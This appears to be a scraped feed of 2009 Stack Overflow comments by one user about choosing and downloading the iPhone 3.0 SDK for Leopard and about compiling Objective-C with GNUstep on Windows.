2009-08-04T18:38:22Z 2009-08-04T18:38:22Z Nope, don't download Snow Leopard version if you have Leopard because then when you go to test on your device it will give you a weird obscure error and you won't be able to do it. http://stackoverflow.com/questions/1229089/which-version-of-the-iphone-3-0-sdk-should-i-download/1229096#1229096 Comment by cmcculloh on Which version of the iPhone 3.0 SDK should I download? cmcculloh 2009-08-04T18:36:53Z 2009-08-04T18:36:53Z Yeah, trying now... thx http://stackoverflow.com/questions/1229089/which-version-of-the-iphone-3-0-sdk-should-i-download/1229096#1229096 Comment by cmcculloh on Which version of the iPhone 3.0 SDK should I download? cmcculloh 2009-08-04T18:18:49Z 2009-08-04T18:18:49Z This is probably true... But why is it I can't mount the file to download it? I can't download the 3.0 or 3.1 versions of the SDK for Leopard, but I can for Snow Leopard just fine... WTH?!?? http://stackoverflow.com/questions/587421/unable-to-find-standard-libraries-when-compiling-objective-c-using-gnustep-on-win Comment by cmcculloh on Unable to find standard libraries when compiling Objective-C using GNUstep on Windows cmcculloh 2009-06-08T10:13:21Z 2009-06-08T10:13:21Z You bought Programming in Objective-C 2.0 by Stephen G. Kochan didn't you? Yeah, I ran into this same problem. The author claims he &quot;pays special attention&quot; to how to get this working in Windows, and then NEVER MENTIONS IT ONCE!